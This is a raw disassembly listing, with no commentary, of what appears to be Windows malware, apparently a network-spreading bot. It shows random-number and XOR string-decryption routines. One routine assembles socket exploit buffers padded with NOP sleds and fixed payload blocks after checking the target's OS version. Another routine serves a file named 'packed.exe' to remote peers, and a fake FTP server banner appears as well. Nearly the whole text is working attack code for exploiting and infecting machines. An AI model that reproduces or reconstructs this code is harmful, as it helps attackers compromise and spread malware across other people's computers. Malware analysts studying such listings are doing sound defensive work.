add ecx, ebx
ror ebx, cl
lock xadd dword_41EAE4, ebx
add ecx, ecx
ror ecx, cl
lock xadd dword_41EAE0, ecx
add ecx, edx
ror edx, cl
lock xadd dword_41EADC, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd dword_41EAE8, edx
lock xadd dword_41EAE4, ecx
lock xadd dword_41EAE0, ebx
lock xadd dword_41EADC, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: .text:004021CD�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE8, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE8, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: .text:00405CFA�p
; .text:00405D70�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE4, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EAE0, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: .text:00405D10�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EADC, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: .text:004168E1�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAF0
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EAF0
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAF0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EAF0[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; ---------------------------------------------------------------------------
loc_410649: ; DATA XREF: .data:off_41CCFE�o
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: .text:0041067F�j
push 0
push 1000h
lea eax, [ebp-1B74h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
push 7
push offset a__ ; "\r\n\\_/."
mov eax, [ebp+8]
push dword ptr [eax+2Ah]
mov eax, [ebp+8]
add eax, 146h
push eax
mov eax, [ebp+8]
add eax, 0C6h
push eax
mov eax, [ebp+8]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp-200h]
push eax
call sub_4125DF
add esp, 20h
mov [ebp-370h], eax
cmp dword ptr [ebp-370h], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: .text:004106E9�j
and dword ptr [ebp-374h], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: .text:0041072A�j
mov eax, [ebp-374h]
inc eax
mov [ebp-374h], eax
loc_410706: ; CODE XREF: .text:004106F7�j
cmp dword ptr [ebp-374h], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp-374h]
mov [ebp+ecx-36Ch], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: .text:00410710�j
push 0Ah
push offset dword_41A8A0
lea eax, [ebp-280h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset dword_41A8F0
lea eax, [ebp-276h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41A8E8
lea eax, [ebp-272h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset dword_41A8EC
lea eax, [ebp-23Ah]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41A8E4
lea eax, [ebp-236h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset dword_41A894
lea eax, [ebp-232h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp-370h]
mov [ebp-204h], eax
and dword ptr [ebp-1B78h], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 18h
mov [ebp-1B78h], eax
push 44h
push offset dword_41A818
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 44h
mov [ebp-1B78h], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 20h
mov [ebp-1B78h], eax
push 4
push offset dword_41A8AC
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 4
mov [ebp-1B78h], eax
push 4
push offset dword_41A8E0
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 4
mov [ebp-1B78h], eax
push 4
push offset dword_41A8D8
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 4
mov [ebp-1B78h], eax
push 4
push offset dword_41A8DC
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 4
mov [ebp-1B78h], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 58h
mov [ebp-1B78h], eax
push 6
push offset dword_41A8B4
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 6
mov [ebp-1B78h], eax
push 8
push 0FFFFFF90h
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 8
mov [ebp-1B78h], eax
push 4
push offset dword_41A8BC
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 4
mov [ebp-1B78h], eax
push 4
push 0FFFFFF90h
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 4
mov [ebp-1B78h], eax
push 6
push offset dword_41A8C4
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 6
mov [ebp-1B78h], eax
push dword ptr [ebp-204h]
push 0FFFFFF90h
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, [ebp-204h]
mov [ebp-1B78h], eax
push dword ptr [ebp-370h]
lea eax, [ebp-200h]
push eax
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, [ebp-370h]
mov [ebp-1B78h], eax
push 168h
lea eax, [ebp-36Ch]
push eax
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 168h
mov [ebp-1B78h], eax
push 0Ah
push offset aA ; "\\A"
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 0Ah
mov [ebp-1B78h], eax
push 32h
push offset dword_41A860
mov eax, [ebp-1B78h]
lea eax, [ebp+eax-0B74h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-1B78h]
add eax, 32h
mov [ebp-1B78h], eax
mov eax, [ebp-1B78h]
mov [ebp-0B6Ch], eax
mov eax, [ebp-1B78h]
sub eax, 18h
mov [ebp-0B64h], eax
push dword ptr [ebp-1B78h]
lea eax, [ebp-0B74h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: .text:00410B32�j
push 0
push 1000h
lea eax, [ebp-1B74h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
locret_410B50: ; CODE XREF: .text:00410681�j
; .text:004106EB�j ...
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset a__ ; "\r\n\\_/."
mov eax, [ebp+8]
push dword ptr [eax+2Ah]
mov eax, [ebp+8]
add eax, 146h
push eax
mov eax, [ebp+8]
add eax, 0C6h
push eax
mov eax, [ebp+8]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp-204h]
push eax
call sub_4125DF
add esp, 20h
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: .text:00410BA8�j
push 89h
push offset dword_41AF50
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: .text:00410BE8�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: .text:00410C28�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: .text:00410C68�j
movsx eax, byte ptr [ebp-7CCh]
sub eax, 30h
mov [ebp-208h], al
movsx eax, byte ptr [ebp-7C8h]
sub eax, 30h
mov [ebp-4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: .text:00410CC2�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: .text:00410CFF�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp-80Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: .text:00410D3F�j
movsx eax, byte ptr [ebp-208h]
cmp eax, 5
jnz loc_410E71
movsx eax, byte ptr [ebp-4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp-0B78h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp-20Ch]
lea eax, [ebp-204h]
push eax
lea eax, [ebp-0AF2h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp-20Ch]
add eax, 60h
push eax
mov eax, [ebp-20Ch]
lea eax, [ebp+eax-0AF2h]
push eax
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp-88Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp-882h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp-85Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp-852h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp-82Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp-0B78h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call ds:dword_41709C ; Sleep
push 36Ah
lea eax, [ebp-0B78h]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: .text:00410D50�j
; .text:00410D5D�j
movsx eax, byte ptr [ebp-208h]
cmp eax, 5
jnz short loc_410E85
movsx eax, byte ptr [ebp-4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: .text:00410E7B�j
movsx eax, byte ptr [ebp-208h]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: .text:00410E83�j
push 86h
push offset dword_41B35C
lea eax, [ebp-104Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp-20Ch]
push eax
push 90h
lea eax, [ebp-0FC6h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push dword ptr [ebp-20Ch]
lea eax, [ebp-204h]
push eax
lea eax, [ebp-0BDEh]
sub eax, [ebp-20Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and dword ptr [ebp-0B7Ch], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: .text:00410F2C�j
mov eax, [ebp-0B7Ch]
inc eax
mov [ebp-0B7Ch], eax
loc_410F06: ; CODE XREF: .text:00410EF7�j
cmp dword ptr [ebp-0B7Ch], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp-0B7Ch]
lea eax, [ebp+eax*4-0BDEh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: .text:00410F0D�j
push 20h
push offset dword_41B3E4
lea eax, [ebp-0B9Eh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp-104Ch]
push eax
mov eax, [ebp+8]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: .text:00410BAA�j
; .text:00410BEA�j ...
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: .text:00410DB7�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: .text:004118D6�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset aPacked_exe ; "packed.exe"
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; ---------------------------------------------------------------------------
loc_41113B: ; DATA XREF: sub_411BBC+156�o
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+8]
mov [ebp-10Ch], eax
push offset a220 ; "220 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
mov al, byte_41DE30
mov [ebp-104h], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp-103h]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp-114h], al
xor eax, eax
lea edi, [ebp-113h]
stosd
stosb
and dword ptr [ebp-4], 0
and dword ptr [ebp-118h], 0
and dword ptr [ebp-108h], 0
loc_4111CC: ; CODE XREF: .text:00411247�j
; .text:004112F8�j ...
push 0EA60h
push dword ptr [ebp-10Ch]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
